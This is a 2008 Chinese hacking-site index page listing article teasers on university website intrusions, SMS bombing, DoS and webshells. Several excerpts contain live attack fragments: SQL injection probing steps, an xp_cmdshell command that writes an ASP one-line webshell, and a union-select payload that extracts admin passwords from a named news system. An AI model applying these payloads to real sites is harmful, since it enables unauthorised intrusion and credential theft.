您现在的位置: 首页>黑客技术>
入侵复旦大学网站
此文章已发表在《黑客X档案》第6期杂志上后经本文作者hackest提交到HST技术论坛欢迎大家转载,但请务必要记住注明此信息!一、师出有名      某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他...
编辑:  来源:  发布于:2008-12-18 01:24:51
入侵清华大学网站全过程
本文已发表于《黑客手册》第六期,转载请注明版权    ,本人此次纯属友情检测,没有对任何服务器造成伤害。文章涉及服务器已经全部打好补丁。请大家不要按图索骥,中国教育网络是脆弱的,请大家不要在给脆弱的心灵增加不必要的伤害 !自上次偶利用ewebed...
编辑:  来源:  发布于:2008-12-18 01:24:04
对某高级技工学校网站的安全检测和加固
今天发现的是一所技工学校,先对其进行安全检测,然后对其出现漏洞的地方进行了防范,下面将漏洞挖掘、分析和修补过程写出来跟大家分享。 (一)漏洞挖掘 1.获取初步信息 某天simeon在群里发了一个IP地址,让众兄弟们看看看看网站安全性如何,说是有奖励。(某人偷笑...
编辑:  来源:  发布于:2008-12-18 01:23:14
IT认证黑幕透视
日渐红火,诱人的“敲门砖” 近年来,随着知识经济的到来,越来越多的工作和信息技术紧密相关。特别是随着互联网的快速发展,网络类认证成为了热门的认证。在国内,据一项调查显示,获得了某项IT认证,个人薪金就可以得到一定幅度的提高。类似的技术认证几乎包...
编辑:  来源:  发布于:2008-12-12 09:10:43
六大厂商云安全大比拼(图)
伴随着“云安全”概念讨论如火如荼,各杀毒厂商也纷纷拿出自己的“云安全”和相关技术落实自己的产品。那么我们该如何看待所谓的“云安全”了?下面我们就收集整理出主流厂商对于“云安全”的看法,为大家一一呈现。 瑞星“云...
编辑:  来源:  发布于:2008-12-10 18:19:04
手机短信轰炸(图)
手机和网络早已密不可分,通过网络,可以直接发送信息到手机上,只是现在已经没有 免费发送短信的网站,如果想通过网站发送短信到手机上,必须先注册用户,确认后才可以 发送信息,只是那样以来,呵呵,发一条信息就是一毛钱,呵呵,我可没那么多钱。呵...
编辑:  来源:  发布于:2008-12-08 11:00:16
phpBB 2.0.13惊现漏洞的解决(图)
一、Path Disclosure 漏洞文件:/db/oracle.php漏洞描叙:直接访问oracle.php,导致暴露web路径涉及版本:phpbb <=2.013 测试:ie提交http://127.0.0.1/phpBB2/db/oracle.php 返回错误: Fatal error: Cannot redeclare sql_nextid() in f...
编辑:  来源:  发布于:2008-12-08 10:59:43
深入了解网络蠕虫(图)
你知道苹果里面会有虫子,可是你知道电脑里面也会有“虫子”吗?虽然这两种虫子截然不同,可是研究发现,电脑“虫子”在衍生、破坏性等方面却和自然界的虫子有不少类似之处。今天,我们就一起来深入了解一下什么是网络“虫子”,以及它的危害和防治。...
编辑:  来源:  发布于:2008-12-08 10:59:08
利用IIS最大连接数实现网站DOS(图)
安全中国提示:本程序仅做为技术研究之用,请勿用于非法用途,否则,后果自负!最近买了个空间来玩,各位勿笑,是入门级的虚拟主机(偶是穷人啊),各种参数都相当低,特别是IIS连接数,只有100个(也就是同时支持100个不同的访问)。这里就出现问题了。如果我一直对该...
编辑:  来源:  发布于:2008-12-08 10:58:33
入侵检测PHP程序中的目录遍历漏洞
 目录遍历漏洞在国内外有许多不同的叫法,比如也可以叫做信息泄露漏洞,非授权文件包含漏洞.名称虽然多,可他们却有一个共同的成因,就是在程序中没有过滤用户输入的../和./之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件,其危害可想而知....
编辑:  来源:  发布于:2008-12-05 08:47:42
Jsp一句话经典后门收藏
java是 面向对象编程的语言了! 啥都是对象!基于编译与解析之间~~-_- ... 估计没有eval execute这样功能的函数了!...但是还是可以留一句话后门的 本来我想用反射实现 像 eval这样的功能.....但是失败了!郁闷!后来没有办法~~ 算了~~ 这样实现吧!程序代码 <...
编辑:  来源:  发布于:2008-12-05 08:47:30
PHP脚本注入十点基本步骤大总结
1.判断是否存在注入,加';and 1=1;and 1=22.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于104.再利用union来查询准确字段,如: and 1=2 uni...
编辑:  来源:  发布于:2008-12-05 08:47:18
一个来自国外的Phpshell--Shell
又一个来自国外的phpshell,在milw0rm看到的。关于为什么起这个名字,作者说:“Couldn't think of a name so it became "Shell I"...”phpshell不稀奇了,介绍这个phpshell主要是他有一个比较有新意的功能:md5 cracker with custom options可以直接在这个phpshell中利...
编辑:  来源:  发布于:2008-12-05 08:47:05
Dxbbs论坛参数过滤不严漏洞利用(通杀7.3以前所有版本)
漏洞出现在User_Friend.aspx , 由于过滤不严,造成name允许注入, 不多说了,自己看吧。-------------------------------------------------------------------------------------------http://www.dxbbs.cn/这是DXBBS官方网站,版本是7.3,用的access数据库在User_Fr...
编辑:  来源:  发布于:2008-12-05 08:46:53
SQL Injection规避入侵检测技术总结
信息来源:天马行空技术小组《SQL Injection规避入侵检测技术总结》当我们对一个运行IDS系统的服务器进行SQL注射时,我们往往会遇到很大的麻烦,因为我们的注射语句被过滤了,如何规避这种检测手段就成了一门新的技术,本文就对此规避技术提出十一条思路和方法,与大...
编辑:  来源:  发布于:2008-12-05 08:46:41
经典:最详细的SQL注入相关的命令整理
1、 用^转义字符来写ASP(一句话木马)文件的方法:? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:mu.asp';--? echo ^<%execute...
编辑:  来源:  发布于:2008-12-05 08:46:28
沸腾新闻系统 V1.1 Access版 Finish(SP2) 注入利用
+ News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2 后台“图文管理”里添加文章,上传一个flas...
编辑:  来源:  发布于:2008-12-05 08:46:11
Sql Injection的终极利器Opendatasource和Openrowset(图)
作者:LCX  目前市面上的SQL INECTION工具很多,最受推崇的当属NBSI了。SQL INECTION的方法在网上是也是满天飞,大家仔细学一下都会很快的成为脚本入侵高手。可是无论是工具,还是众多方法,猜SQL数据的时候原理不外乎两种。一个是对方的WEB服务器在没有关闭错误提...
编辑:  来源:  发布于:2008-12-05 08:45:52
天清入侵防御系统SQL注入防御技术白皮书
  背景知识   什么是SQL注入   SQL注入:利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,这是SQL注入的标准释义。   随着B/S模式被广泛的应用,用这种模式编写应用程序的程序员也越来越多,但由于开发人员的水平和经验参差不齐,相当一部...
编辑:  来源:  发布于:2008-12-05 08:45:34
对偶偶娱乐分站服务器的安全检测
前些日子在家无聊,去了一些视频站看看搞笑的视频啥的,听说偶偶娱乐那个站还不错,但是打开来卡的要命,视频半天也不动,郁闷!偶然间不知道点进了哪个连接,进入了一个219.238.xxx.xxx这个地址,FLASH做的还不错,呵呵! 于是到http://www.myipneighbors.co...
编辑:  来源:  发布于:2008-12-05 08:45:22
共149页/2975条 首页 12 3 4 5 6 7 下一页 末页
站内搜索
原创,自由,免费,平等、携手共创和谐网络!
赞助商广告
最新文章
随机栏目推荐
推荐文章